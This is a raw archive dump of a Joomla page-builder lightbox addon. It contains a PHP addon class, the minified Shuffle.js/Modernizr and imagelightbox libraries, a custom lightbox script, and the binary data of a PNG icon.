				$output .= '</li>';
			}	
			
		}
		
		$output .= '</ul>';
		$output	.= '</div>';
		$output .= '</div>';

		return $output;
	}
	
	public function stylesheets() {
		$app = JFactory::getApplication();
		$tmplPath = JURI::base(true) . '/templates/'.$app->getTemplate();	
		return array( $tmplPath.'/sppagebuilder/addons/lightbox/assets/css/imagelightbox.css');
	}
	

	public function scripts() {
		$app = JFactory::getApplication();
		$tmplPath = JURI::base(true) . '/templates/'.$app->getTemplate();	
		
		return array(
			$tmplPath.'/sppagebuilder/addons/lightbox/assets/js/imagelightbox.min.js',
			$tmplPath.'/sppagebuilder/addons/lightbox/assets/js/imagelightbox.custom.js',
			$tmplPath.'/html/com_spsimpleportfolio/assets/js/jquery.shuffle.modernizr.min.js'
		);
	}

	public function js() {
		$gutter = (isset($this->addon->settings->spacing) && $this->addon->settings->spacing) ? 'gutterWidth: ' . $this->addon->settings->spacing . ',' : '';
		$js ='jQuery(function($){
			var $grid = jQuery("#grid-'.$this->addon->id.'"),
			$sizer = $grid.find(".shuffle_sizer");
			$("#grid-'.$this->addon->id.'").imagesLoaded(function(){
			  $grid.shuffle({itemSelector: ".shuffle-item",'.$gutter.'columnWidth: '.$this->addon->settings->width.',speed: 700,sequentialFadeDelay: 150,easing: \'cubic-bezier(0.635, 0.010, 0.355, 1.000)\',sizer: $sizer
			  });
			}); 
		});';
		$js = preg_replace(array('/([\s])\1+/', '/[\n\t]+/m'), '', $js); // Remove whitespace
		return $js;
	}

}
PK!��f8�=�=Lflex/sppagebuilder/addons/lightbox/assets/js/jquery.shuffle.modernizr.min.jsnu&1i�/*!
 * Shuffle.js by @Vestride
 * Categorize, sort, and filter a responsive grid of items.
 * Dependencies: jQuery 1.9+, Modernizr 2.6.2+
 * @license MIT license
 * @version 3.0.0
 */
window.Modernizr=function(a,b,c){function d(a){s.cssText=a}function e(a,b){return typeof a===b}function f(a,b){return!!~(""+a).indexOf(b)}function g(a,b){for(var d in a){var e=a[d];if(!f(e,"-")&&s[e]!==c)return"pfx"==b?e:!0}return!1}function h(a,b,d){for(var f in a){var g=b[a[f]];if(g!==c)return d===!1?a[f]:e(g,"function")?g.bind(d||b):g}return!1}function i(a,b,c){var d=a.charAt(0).toUpperCase()+a.slice(1),f=(a+" "+v.join(d+" ")+d).split(" ");return e(b,"string")||e(b,"undefined")?g(f,b):(f=(a+" "+w.join(d+" ")+d).split(" "),h(f,b,c))}var j,k,l,m="2.6.2",n={},o=!0,p=b.documentElement,q="modernizr",r=b.createElement(q),s=r.style,t=({}.toString," -webkit- -moz- -o- -ms- ".split(" ")),u="Webkit Moz O ms",v=u.split(" "),w=u.toLowerCase().split(" "),x={},y=[],z=y.slice,A=function(a,c,d,e){var f,g,h,i,j=b.createElement("div"),k=b.body,l=k||b.createElement("body");if(parseInt(d,10))for(;d--;)h=b.createElement("div"),h.id=e?e[d]:q+(d+1),j.appendChild(h);return f=["&#173;",'<style id="s',q,'">',a,"</style>"].join(""),j.id=q,(k?j:l).innerHTML+=f,l.appendChild(j),k||(l.style.background="",l.style.overflow="hidden",i=p.style.overflow,p.style.overflow="hidden",p.appendChild(l)),g=c(j,a),k?j.parentNode.removeChild(j):(l.parentNode.removeChild(l),p.style.overflow=i),!!g},B={}.hasOwnProperty;l=e(B,"undefined")||e(B.call,"undefined")?function(a,b){return b in a&&e(a.constructor.prototype[b],"undefined")}:function(a,b){return B.call(a,b)},Function.prototype.bind||(Function.prototype.bind=function(a){var b=this;if("function"!=typeof b)throw new TypeError;var c=z.call(arguments,1),d=function(){if(this instanceof d){var e=function(){};e.prototype=b.prototype;var f=new e,g=b.apply(f,c.concat(z.call(arguments)));return Object(g)===g?g:f}return b.apply(a,c.concat(z.call(arguments)))};return d}),x.csstransforms=function(){return!!i("transform")},x.csstransforms3d=function(){var a=!!i("perspective");return a&&"webkitPerspective"in p.style&&A("@media (transform-3d),(-webkit-transform-3d){#modernizr{left:9px;position:absolute;height:3px;}}",function(b){a=9===b.offsetLeft&&3===b.offsetHeight}),a},x.csstransitions=function(){return i("transition")};for(var C in x)l(x,C)&&(k=C.toLowerCase(),n[k]=x[C](),y.push((n[k]?"":"no-")+k));return n.addTest=function(a,b){if("object"==typeof a)for(var d in a)l(a,d)&&n.addTest(d,a[d]);else{if(a=a.toLowerCase(),n[a]!==c)return n;b="function"==typeof b?b():b,"undefined"!=typeof o&&o&&(p.className+=" "+(b?"":"no-")+a),n[a]=b}return n},d(""),r=j=null,n._version=m,n._prefixes=t,n._domPrefixes=w,n._cssomPrefixes=v,n.testProp=function(a){return g([a])},n.testAllProps=i,n.testStyles=A,n.prefixed=function(a,b,c){return b?i(a,b,c):i(a,"pfx")},p.className=p.className.replace(/(^|\s)no-js(\s|$)/,"$1$2")+(o?" js "+y.join(" "):""),n}(this,this.document),function(a){"function"==typeof define&&define.amd?define(["jquery","modernizr"],a):window.Shuffle=a(window.jQuery,window.Modernizr)}(function(a,b,c){"use strict";function d(a){return a?a.replace(/([A-Z])/g,function(a,b){return"-"+b.toLowerCase()}).replace(/^ms-/,"-ms-"):""}function e(b,c,d){var e,f,g,h=null,i=0;d=d||{};var j=function(){i=d.leading===!1?0:a.now(),h=null,g=b.apply(e,f),e=f=null};return function(){var k=a.now();i||d.leading!==!1||(i=k);var l=c-(k-i);return e=this,f=arguments,0>=l||l>c?(clearTimeout(h),h=null,i=k,g=b.apply(e,f),e=f=null):h||d.trailing===!1||(h=setTimeout(j,l)),g}}function f(a,b,c){for(var d=0,e=a.length;e>d;d++)if(b.call(c,a[d],d,a)==={})return}function g(b,c,d){return setTimeout(a.proxy(b,c),d)}function h(a){return Math.max.apply(Math,a)}function i(a){return Math.min.apply(Math,a)}function j(b){return a.isNumeric(b)?b:0}function k(a){var b,c,d=a.length;if(!d)return a;for(;--d;)c=Math.floor(Math.random()*(d+1)),b=a[c],a[c]=a[d],a[d]=b;return a}if("object"!=typeof b)throw new Error("Shuffle.js requires Modernizr.\nhttp://vestride.github.io/Shuffle/#dependencies");var l=b.prefixed("transition"),m=b.prefixed("transitionDelay"),n=b.prefixed("transitionDuration"),o={WebkitTransition:"webkitTransitionEnd",transition:"transitionend"}[l],p=b.prefixed("transform"),q=d(p),r=b.csstransforms&&b.csstransitions,s=b.csstransforms3d,t="shuffle",u=.3,v="all",w="groups",x=1,y=.001,z=function(a,b){this.x=j(a),this.y=j(b)};z.equals=function(a,b){return a.x===b.x&&a.y===b.y};var A=0,B=a(window),C=function(b,c){c=c||{},a.extend(this,C.options,c,C.settings),this.$el=a(b),this.element=b,this.unique="shuffle_"+A++,this._fire(C.EventType.LOADING),this._init(),g(function(){this.initialized=!0,this._fire(C.EventType.DONE)},this,16)};return C.EventType={LOADING:"loading",DONE:"done",LAYOUT:"layout",REMOVED:"removed"},C.ClassName={BASE:t,SHUFFLE_ITEM:"shuffle-item",FILTERED:"filtered",CONCEALED:"concealed"},C.options={group:v,speed:250,easing:"ease-out",itemSelector:"",sizer:null,gutterWidth:0,columnWidth:0,delimeter:null,buffer:0,initialSort:null,throttle:e,throttleTime:300,sequentialFadeDelay:150,supported:r},C.settings={useSizer:!1,itemCss:{position:"absolute",top:0,left:0,visibility:"visible"},revealAppendedDelay:300,lastSort:{},lastFilter:v,enabled:!0,destroyed:!1,initialized:!1,_animations:[],styleQueue:[]},C.Point=z,C._getItemTransformString=function(a,b){return s?"translate3d("+a.x+"px, "+a.y+"px, 0) scale3d("+b+", "+b+", 1)":"translate("+a.x+"px, "+a.y+"px) scale("+b+")"},C._getNumberStyle=function(b,c){return C._getFloat(a(b).css(c))},C._getInt=function(a){return j(parseInt(a,10))},C._getFloat=function(a){return j(parseFloat(a))},C._getOuterWidth=function(a,b){var c=a.offsetWidth;if(b){var d=C._getNumberStyle(a,"marginLeft"),e=C._getNumberStyle(a,"marginRight");c+=d+e}return c},C._getOuterHeight=function(a,b){var c=a.offsetHeight;if(b){var d=C._getNumberStyle(a,"marginTop"),e=C._getNumberStyle(a,"marginBottom");c+=d+e}return c},C._skipTransition=function(a,b,c){var d=a.style[n];a.style[n]="0ms",b.call(c);var e=a.offsetWidth;e=null,a.style[n]=d},C.prototype._init=function(){this.$items=this._getItems(),this.sizer=this._getElementOption(this.sizer),this.sizer&&(this.useSizer=!0),this.$el.addClass(C.ClassName.BASE),this._initItems(),B.on("resize."+t+"."+this.unique,this._getResizeFunction());var a=this.$el.css(["position","overflow"]),b=C._getOuterWidth(this.element);this._validateStyles(a),this._setColumns(b),this.shuffle(this.group,this.initialSort),this.supported&&g(function(){this._setTransitions(),this.element.style[l]="height "+this.speed+"ms "+this.easing},this)},C.prototype._getResizeFunction=function(){var b=a.proxy(this._onResize,this);return this.throttle?this.throttle(b,this.throttleTime):b},C.prototype._getElementOption=function(a){return"string"==typeof a?this.$el.find(a)[0]||null:a&&a.nodeType&&1===a.nodeType?a:a&&a.jquery?a[0]:null},C.prototype._validateStyles=function(a){"static"===a.position&&(this.element.style.position="relative"),"hidden"!==a.overflow&&(this.element.style.overflow="hidden")},C.prototype._filter=function(a,b){a=a||this.lastFilter,b=b||this.$items;var c=this._getFilteredSets(a,b);return this._toggleFilterClasses(c.filtered,c.concealed),this.lastFilter=a,"string"==typeof a&&(this.group=a),c.filtered},C.prototype._getFilteredSets=function(b,c){var d=a(),e=a();return b===v?d=c:f(c,function(c){var f=a(c);this._doesPassFilter(b,f)?d=d.add(f):e=e.add(f)},this),{filtered:d,concealed:e}},C.prototype._doesPassFilter=function(b,c){if(a.isFunction(b))return b.call(c[0],c,this);var d=c.data(w),e=this.delimeter&&!a.isArray(d)?d.split(this.delimeter):d;return a.inArray(b,e)>-1},C.prototype._toggleFilterClasses=function(a,b){a.removeClass(C.ClassName.CONCEALED).addClass(C.ClassName.FILTERED),b.removeClass(C.ClassName.FILTERED).addClass(C.ClassName.CONCEALED)},C.prototype._initItems=function(a){a=a||this.$items,a.addClass([C.ClassName.SHUFFLE_ITEM,C.ClassName.FILTERED].join(" ")),a.css(this.itemCss).data("point",new z).data("scale",x)},C.prototype._updateItemCount=function(){this.visibleItems=this._getFilteredItems().length},C.prototype._setTransition=function(a){a.style[l]=q+" "+this.speed+"ms "+this.easing+", opacity "+this.speed+"ms "+this.easing},C.prototype._setTransitions=function(a){a=a||this.$items,f(a,function(a){this._setTransition(a)},this)},C.prototype._setSequentialDelay=function(a){this.supported&&f(a,function(a,b){a.style[m]="0ms,"+(b+1)*this.sequentialFadeDelay+"ms"},this)},C.prototype._getItems=function(){return this.$el.children(this.itemSelector)},C.prototype._getFilteredItems=function(){return this.$items.filter("."+C.ClassName.FILTERED)},C.prototype._getConcealedItems=function(){return this.$items.filter("."+C.ClassName.CONCEALED)},C.prototype._getColumnSize=function(b,c){var d;return d=a.isFunction(this.columnWidth)?this.columnWidth(b):this.useSizer?C._getOuterWidth(this.sizer):this.columnWidth?this.columnWidth:this.$items.length>0?C._getOuterWidth(this.$items[0],!0):b,0===d&&(d=b),d+c},C.prototype._getGutterSize=function(b){var c;return c=a.isFunction(this.gutterWidth)?this.gutterWidth(b):this.useSizer?C._getNumberStyle(this.sizer,"marginLeft"):this.gutterWidth},C.prototype._setColumns=function(a){var b=a||C._getOuterWidth(this.element),c=this._getGutterSize(b),d=this._getColumnSize(b,c),e=(b+c)/d;Math.abs(Math.round(e)-e)<u&&(e=Math.round(e)),this.cols=Math.max(Math.floor(e),1),this.containerWidth=b,this.colWidth=d},C.prototype._setContainerSize=function(){this.$el.css("height",this._getContainerSize())},C.prototype._getContainerSize=function(){return h(this.positions)},C.prototype._fire=function(a,b){this.$el.trigger(a+"."+t,b&&b.length?b:[this])},C.prototype._resetCols=function(){var a=this.cols;for(this.positions=[];a--;)this.positions.push(0)},C.prototype._layout=function(a,b){f(a,function(a){this._layoutItem(a,!!b)},this),this._processStyleQueue(),this._setContainerSize()},C.prototype._layoutItem=function(b,c){var d=a(b),e=d.data(),f=e.point,g=e.scale,h={width:C._getOuterWidth(b,!0),height:C._getOuterHeight(b,!0)},i=this._getItemPosition(h);z.equals(f,i)&&g===x||(e.point=i,e.scale=x,this.styleQueue.push({$item:d,point:i,scale:x,opacity:c?0:1,skipTransition:c,callfront:function(){c||d.css("visibility","visible")},callback:function(){c&&d.css("visibility","hidden")}}))},C.prototype._getItemPosition=function(a){for(var b=this._getColumnSpan(a.width,this.colWidth,this.cols),c=this._getColumnSet(b,this.cols),d=this._getShortColumn(c,this.buffer),e=new z(Math.round(this.colWidth*d),Math.round(c[d])),f=c[d]+a.height,g=this.cols+1-c.length,h=0;g>h;h++)this.positions[d+h]=f;return e},C.prototype._getColumnSpan=function(a,b,c){var d=a/b;return Math.abs(Math.round(d)-d)<u&&(d=Math.round(d)),Math.min(Math.ceil(d),c)},C.prototype._getColumnSet=function(a,b){if(1===a)return this.positions;for(var c=b+1-a,d=[],e=0;c>e;e++)d[e]=h(this.positions.slice(e,e+a));return d},C.prototype._getShortColumn=function(a,b){for(var c=i(a),d=0,e=a.length;e>d;d++)if(a[d]>=c-b&&a[d]<=c+b)return d;return 0},C.prototype._shrink=function(b){var c=b||this._getConcealedItems();f(c,function(b){var c=a(b),d=c.data();d.scale!==y&&(d.scale=y,this.styleQueue.push({$item:c,point:d.point,scale:y,opacity:0,callback:function(){c.css("visibility","hidden")}}))},this)},C.prototype._onResize=function(){if(this.enabled&&!this.destroyed&&!this.isTransitioning){var a=C._getOuterWidth(this.element);a!==this.containerWidth&&this.update()}},C.prototype._getStylesForTransition=function(a){var b={opacity:a.opacity};return this.supported?b[p]=C._getItemTransformString(a.point,a.scale):(b.left=a.point.x,b.top=a.point.y),b},C.prototype._transition=function(b){var c=this._getStylesForTransition(b);this._startItemAnimation(b.$item,c,b.callfront||a.noop,b.callback||a.noop)},C.prototype._startItemAnimation=function(b,c,d,e){function f(b){b.target===b.currentTarget&&(a(b.target).off(o,f),e())}if(d(),!this.initialized)return b.css(c),void e();if(this.supported)b.css(c),b.on(o,f);else{var g=b.stop(!0).animate(c,this.speed,"swing",e);this._animations.push(g.promise())}},C.prototype._processStyleQueue=function(b){var c=a();f(this.styleQueue,function(a){a.skipTransition?this._styleImmediately(a):(c=c.add(a.$item),this._transition(a))},this),c.length>0&&this.initialized?(this.isTransitioning=!0,this.supported?this._whenCollectionDone(c,o,this._movementFinished):this._whenAnimationsDone(this._movementFinished)):b||g(this._layoutEnd,this),this.styleQueue.length=0},C.prototype._styleImmediately=function(a){C._skipTransition(a.$item[0],function(){a.$item.css(this._getStylesForTransition(a))},this)},C.prototype._movementFinished=function(){this.isTransitioning=!1,this._layoutEnd()},C.prototype._layoutEnd=function(){this._fire(C.EventType.LAYOUT)},C.prototype._addItems=function(a,b,c){this._initItems(a),this._setTransitions(a),this.$items=this._getItems(),this._shrink(a),f(this.styleQueue,function(a){a.skipTransition=!0}),this._processStyleQueue(!0),b?this._addItemsToEnd(a,c):this.shuffle(this.lastFilter)},C.prototype._addItemsToEnd=function(a,b){var c=this._filter(null,a),d=c.get();this._updateItemCount(),this._layout(d,!0),b&&this.supported&&this._setSequentialDelay(d),this._revealAppended(d)},C.prototype._revealAppended=function(b){g(function(){f(b,function(b){var c=a(b);this._transition({$item:c,opacity:1,point:c.data("point"),scale:x})},this),this._whenCollectionDone(a(b),o,function(){a(b).css(m,"0ms"),this._movementFinished()})},this,this.revealAppendedDelay)},C.prototype._whenCollectionDone=function(b,c,d){function e(b){b.target===b.currentTarget&&(a(b.target).off(c,e),f++,f===g&&d.call(h))}var f=0,g=b.length,h=this;b.on(c,e)},C.prototype._whenAnimationsDone=function(b){a.when.apply(null,this._animations).always(a.proxy(function(){this._animations.length=0,b.call(this)},this))},C.prototype.shuffle=function(a,b){this.enabled&&!this.isTransitioning&&(a||(a=v),this._filter(a),this._updateItemCount(),this._shrink(),this.sort(b))},C.prototype.sort=function(a){if(this.enabled&&!this.isTransitioning){this._resetCols();var b=a||this.lastSort,c=this._getFilteredItems().sorted(b);this._layout(c),this.lastSort=b}},C.prototype.update=function(a){this.enabled&&!this.isTransitioning&&(a||this._setColumns(),this.sort())},C.prototype.layout=function(){this.update(!0)},C.prototype.appended=function(a,b,c){this._addItems(a,b===!0,c!==!1)},C.prototype.disable=function(){this.enabled=!1},C.prototype.enable=function(a){this.enabled=!0,a!==!1&&this.update()},C.prototype.remove=function(b){function c(){b.remove(),this.$items=this._getItems(),this._updateItemCount(),this._fire(C.EventType.REMOVED,[b,this]),b=null}b.length&&b.jquery&&(this._toggleFilterClasses(a(),b),this._shrink(b),this.sort(),this.$el.one(C.EventType.LAYOUT+"."+t,a.proxy(c,this)))},C.prototype.destroy=function(){B.off("."+this.unique),this.$el.removeClass(t).removeAttr("style").removeData(t),this.$items.removeAttr("style").removeData("point").removeData("scale").removeClass([C.ClassName.CONCEALED,C.ClassName.FILTERED,C.ClassName.SHUFFLE_ITEM].join(" ")),this.$items=null,this.$el=null,this.sizer=null,this.element=null,this.destroyed=!0},a.fn.shuffle=function(b){var c=Array.prototype.slice.call(arguments,1);return this.each(function(){var d=a(this),e=d.data(t);e?"string"==typeof b&&e[b]&&e[b].apply(e,c):(e=new C(this,b),d.data(t,e))})},a.fn.sorted=function(b){var d=a.extend({},a.fn.sorted.defaults,b),e=this.get(),f=!1;return e.length?d.randomize?k(e):(a.isFunction(d.by)&&e.sort(function(b,e){if(f)return 0;var g=d.by(a(b)),h=d.by(a(e));return g===c&&h===c?(f=!0,0):h>g||"sortFirst"===g||"sortLast"===h?-1:g>h||"sortLast"===g||"sortFirst"===h?1:0}),f?this.get():(d.reverse&&e.reverse(),e)):[]},a.fn.sorted.defaults={reverse:!1,by:null,randomize:!1},C});PK!
��"��Dflex/sppagebuilder/addons/lightbox/assets/js/imagelightbox.custom.jsnu&1i� jQuery(function($) {
    $(document).ready(function() {

        // ACTIVITY INDICATOR
        var activityIndicatorOn = function() {
                $('<div id="imagelightbox-loading"><div></div></div>').appendTo('body');
            },
            activityIndicatorOff = function() {
                $('#imagelightbox-loading').remove();
            },


            // OVERLAY
            overlayOn = function() {
                $('<div id="imagelightbox-overlay"></div>').appendTo('body');
            },
            overlayOff = function() {
                $('#imagelightbox-overlay').remove();
            },


            // CLOSE BUTTON
            closeButtonOn = function(instance) {
                $('<button type="button" id="imagelightbox-close" title="Close"></button>').appendTo('body').on('click touchend', function() {
                    $(this).remove();
                    instance.quitImageLightbox();
                    return false;
                });
            },
            closeButtonOff = function() {
                $('#imagelightbox-close').remove();
            },


            // CAPTION
            captionOn = function() {
                var description = $('a[href="' + $('#imagelightbox').attr('src') + '"] img').attr('alt');
                if (description.length > 0)
                    $('<div id="imagelightbox-caption">' + description + '</div>').appendTo('body');
            },
            captionOff = function() {
                $('#imagelightbox-caption').remove();
            },


            // NAVIGATION
            navigationOn = function(instance, selector) {
                var images = $(selector);
                if (images.length) {
                    var nav = $('<div id="imagelightbox-nav"></div>');
                    for (var i = 0; i < images.length; i++)
                        nav.append('<button type="button"></button>');

                    nav.appendTo('body');
                    nav.on('click touchend', function() {
                        return false;
                    });

                    var navItems = nav.find('button');
                    navItems.on('click touchend', function() {
                            var $this = $(this);
                            if (images.eq($this.index()).attr('href') != $('#imagelightbox').attr('src'))
                                instance.switchImageLightbox($this.index());

                            navItems.removeClass('active');
                            navItems.eq($this.index()).addClass('active');

                            return false;
                        })
                        .on('touchend', function() {
                            return false;
                        });
                }
            },
            navigationUpdate = function(selector) {
                var items = $('#imagelightbox-nav button');
                items.removeClass('active');
                items.eq($(selector).filter('[href="' + $('#imagelightbox').attr('src') + '"]').index(selector)).addClass('active');
            },
            navigationOff = function() {
                $('#imagelightbox-nav').remove();
            },


            // ARROWS
            arrowsOn = function(instance, selector) {
                var $arrows = $('<button type="button" class="imagelightbox-arrow imagelightbox-arrow-left"><i class="ap-left-2"></i></button><button type="button" class="imagelightbox-arrow imagelightbox-arrow-right"><i class="ap-right-2"></i></button>');

                $arrows.appendTo('body');

                $arrows.on('click touchend', function(e) {
                    e.preventDefault();

                    var $this = $(this),
                        $target = $(selector + '[href="' + $('#imagelightbox').attr('src') + '"]'),
                        index = $target.index(selector);

                    if ($this.hasClass('imagelightbox-arrow-left')) {
                        index = index - 1;
                        if (!$(selector).eq(index).length)
                            index = $(selector).length;
                    } else {
                        index = index + 1;
                        if (!$(selector).eq(index).length)
                            index = 0;
                    }

                    instance.switchImageLightbox(index);
                    return false;
                });
            },
            arrowsOff = function() {
                $('.imagelightbox-arrow').remove();
            };

		//	WITH "CLOSE" BUTTON & ACTIVITY INDICATION (One Image)
		var instanceC = $( 'a[data-imagelightbox="one"]' ).imageLightbox({
			quitOnDocClick:	false,
			onStart:		function() { closeButtonOn( instanceC ); },
			onEnd:			function() { closeButtonOff(); activityIndicatorOff(); },
			onLoadStart: 	function() { activityIndicatorOn(); },
			onLoadEnd:	 	function() { activityIndicatorOff(); }
		});
		

        //	ALL COMBINED
        var $selector = 'a[data-imagelightbox="imagelightbox"]';
        var $instance = $($selector).imageLightbox({
            onStart: function() {
                overlayOn();
                closeButtonOn($instance);
                arrowsOn($instance, $selector);
            },
            onEnd: function() {
                overlayOff();
                captionOff();
                closeButtonOff();
                arrowsOff();
                activityIndicatorOff();
            },
            onLoadStart: function() {
                captionOff();
                activityIndicatorOn();
            },
            onLoadEnd: function() {
                captionOn();
                activityIndicatorOff();
                $('.imagelightbox-arrow').css('display', 'block');
            }
        });


    });
});PK!�3�T]]Aflex/sppagebuilder/addons/lightbox/assets/js/imagelightbox.min.jsnu&1i�!function(t,e,n){"use strict";var i=function(){var t=n.body||n.documentElement;return t=t.style,""===t.WebkitTransition?"-webkit-":""===t.MozTransition?"-moz-":""===t.OTransition?"-o-":""===t.transition?"":!1},o=i()!==!1,r=function(t,e,n){var o={},r=i();o[r+"transform"]="translateX("+e+")",o[r+"transition"]=r+"transform "+n+"s linear",t.css(o)},a="ontouchstart"in e,u=e.navigator.pointerEnabled||e.navigator.msPointerEnabled,d=function(t){if(a)return!0;if(!u||"undefined"==typeof t||"undefined"==typeof t.pointerType)return!1;if("undefined"!=typeof t.MSPOINTER_TYPE_MOUSE){if(t.MSPOINTER_TYPE_MOUSE!==t.pointerType)return!0}else if("mouse"!==t.pointerType)return!0;return!1};t.fn.imageLightbox=function(i){var c=t.extend({selector:'id="imagelightbox"',allowedTypes:"png|jpg|jpeg|gif",animationSpeed:250,preloadNext:!0,enableKeyboard:!0,quitOnEnd:!1,quitOnImgClick:!1,quitOnDocClick:!0,onStart:!1,onEnd:!1,onLoadStart:!1,onLoadEnd:!1},i),f=t([]),l=t(),p=t(),s=0,g=0,h=0,v=!1,m=function(e){return"a"===t(e).prop("tagName").toLowerCase()&&new RegExp(".("+c.allowedTypes+")$","i").test(t(e).attr("href"))},x=function(){if(!p.length)return!1;var n=.8*t(e).width(),i=.9*t(e).height(),o=new Image;o.src=p.attr("src"),o.onload=function(){if(s=o.width,g=o.height,s>n||g>i){var r=s/g>n/i?s/n:g/i;s/=r,g/=r}p.css({width:s+"px",height:g+"px",top:(t(e).height()-g)/2+"px",left:(t(e).width()-s)/2+"px"})}},E=function(e){if(v)return!1;if(e="undefined"==typeof e?!1:"left"===e?1:-1,p.length){if(e!==!1&&(f.length<2||c.quitOnEnd===!0&&(-1===e&&0===f.index(l)||1===e&&f.index(l)===f.length-1)))return S(),!1;var n={opacity:0};o?r(p,100*e-h+"px",c.animationSpeed/1e3):n.left=parseInt(p.css("left"))+100*e+"px",p.animate(n,c.animationSpeed,function(){y()}),h=0}v=!0,c.onLoadStart!==!1&&c.onLoadStart(),setTimeout(function(){p=t("<img "+c.selector+" />").attr("src",l.attr("href")).load(function(){p.appendTo("body"),x();var n={opacity:1};if(p.css("opacity",0),o)r(p,-100*e+"px",0),setTimeout(function(){r(p,"0px",c.animationSpeed/1e3)},50);else{var i=parseInt(p.css("left"));n.left=i+"px",p.css("left",i-100*e+"px")}if(p.animate(n,c.animationSpeed,function(){v=!1,c.onLoadEnd!==!1&&c.onLoadEnd()}),c.preloadNext){var a=f.eq(f.index(l)+1);a.length||(a=f.eq(0)),t("<img />").attr("src",a.attr("href")).load()}}).error(function(){c.onLoadEnd!==!1&&c.onLoadEnd()});var n=0,i=0,a=0;p.on(u?"pointerup MSPointerUp":"click",function(t){if(t.preventDefault(),c.quitOnImgClick)return S(),!1;if(d(t.originalEvent))return!0;var e=(t.pageX||t.originalEvent.pageX)-t.target.offsetLeft;l=f.eq(f.index(l)-(s/2>e?1:-1)),l.length||(l=f.eq(s/2>e?f.length:0)),E(s/2>e?"left":"right")}).on("touchstart pointerdown MSPointerDown",function(t){return!d(t.originalEvent)||c.quitOnImgClick?!0:(o&&(a=parseInt(p.css("left"))),void(n=t.originalEvent.pageX||t.originalEvent.touches[0].pageX))}).on("touchmove pointermove MSPointerMove",function(t){return!d(t.originalEvent)||c.quitOnImgClick?!0:(t.preventDefault(),i=t.originalEvent.pageX||t.originalEvent.touches[0].pageX,h=n-i,void(o?r(p,-h+"px",0):p.css("left",a-h+"px")))}).on("touchend touchcancel pointerup pointercancel MSPointerUp MSPointerCancel",function(t){return!d(t.originalEvent)||c.quitOnImgClick?!0:void(Math.abs(h)>50?(l=f.eq(f.index(l)-(0>h?1:-1)),l.length||(l=f.eq(0>h?f.length:0)),E(h>0?"right":"left")):o?r(p,"0px",c.animationSpeed/1e3):p.animate({left:a+"px"},c.animationSpeed/2))})},c.animationSpeed+100)},y=function(){return p.length?(p.remove(),void(p=t())):!1},S=function(){return p.length?void p.animate({opacity:0},c.animationSpeed,function(){y(),v=!1,c.onEnd!==!1&&c.onEnd()}):!1};return t(e).on("resize",x),c.quitOnDocClick&&t(n).on(a?"touchend":"click",function(e){p.length&&!t(e.target).is(p)&&S()}),c.enableKeyboard&&t(n).on("keyup",function(t){return p.length?(t.preventDefault(),27===t.keyCode&&S(),void((37===t.keyCode||39===t.keyCode)&&(l=f.eq(f.index(l)-(37===t.keyCode?1:-1)),l.length||(l=f.eq(37===t.keyCode?f.length:0)),E(37===t.keyCode?"left":"right")))):!0}),t(n).off("click",this.selector),t(n).on("click",this.selector,function(e){return m(this)?(e.preventDefault(),v?!1:(v=!1,c.onStart!==!1&&c.onStart(),l=t(this),void E())):!0}),this.each(function(){return m(this)?void(f=f.add(t(this))):!0}),this.switchImageLightbox=function(t){var e=f.eq(t);if(e.length){var n=f.index(l);l=e,E(n>t?"left":"right")}return this},this.quitImageLightbox=function(){return S(),this},this}}(jQuery,window,document);PK!�DXB		9flex/sppagebuilder/addons/lightbox/assets/images/icon.pngnu&1i��PNG


IHDR@@�iq�tEXtSoftwareAdobe ImageReadyq�e<siTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.5-c021 79.154911, 2013/10/29-11:47:16        "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:b60ed45f-ce64-44b1-a029-4882b1d53251" xmpMM:DocumentID="xmp.did:E8E011B65A3911E5B190DF20FA0AEDC1" xmpMM:InstanceID="xmp.iid:E8E011B55A3911E5B190DF20FA0AEDC1" xmp:CreatorTool="Adobe Photoshop CC (Macintosh)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:d98b6966-7007-4203-9d82-dd27c9307796" stRef:documentID="xmp.did:b60ed45f-ce64-44b1-a029-4882b1d53251"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>��P
,IDATx��[ilT��f��u�`�cC��5qU�����t�J�B�TmT�G���H���H�ZEQh��%%������K��`�6�}6OϽ�f���s�c޼��=�wι��t�8�@�-W/�=I4N|��*�a��:���N~���9x�)�8O�;��$>d{��D�� ~��q�����L��J����O?Yd|����,��~"����p�#����dW�`�J�����_���_iÀ��5aU.���T/t��ϩ�e�$_�(W*��c-�3�X��������B*��r��
�\xŔ�qN�+GϡK�Of�F_-'P�jV�o}���7��p��KX�q+�!S�1=4ä���Q�R���9�|d}5a�"8	��Z�E.Qq�x��/���
��^[y�z�x�L&C������O�Gp����L&�!$1
�q��ƒ�˜GD�b���t��&!p��,��:����ӭ�t�+����g���a�;‹��R�>t����'��^ۄ�T������ft�3zƻ�{�	����C�*�\G�TX�R�\SeH �4ЏM=�^�"��t��U�~|,�;!ӌ	����:�n�s��(�/8(�JұxS	#C9P2����g�����9�rC?>��=�i��y�g�O���.����K~��@%b
S�xC��#���E�����Q�z
dr�/����ߔt2;1p�&�J����V�	P�+���#�/���߹�j}�ր����9�k�����N�s�!��24P
%"��Z[�hQ��8��F<+���)��XѮZ��z>���������}��a��q`��[�!)_ZF�ô�R�dVyMi��K��bs��~��'��Ǣ�e��˷�O����p�(��oz<�7s�``��C
��Kvt�o�V	F�r�6g`��7i˓ǩ��#�+�)ԎZ�r��j�+�D�yߩFhRf�ݤ��Lp���&���J�u����p��	�0]׀;G�d�*RF"	���!p��W)��/>K`�Ӧс�m�Ԑ�
��}��1�v�{^���XJ=��`n%D���vA����@-�ĺ=��eֿo�k��<ɱ���{'�c�k��.kN��`梠���S�h����Zd�O<�q�2���[��E��zU�����=���N�+M�z��E5w�B�q����7uz��l�R֚N�+�x����ݠ�
9��Ihb4��	�Yx�z��=�cN
�V�95��E�↮w���
�b�����2k��u��˱��a�lLގ�H\a~|W����kQ��o��q���I�"%yM��2�gN۾�7�z�V�����-����Sn�%�	���32�f�g�b„+�yߪB���
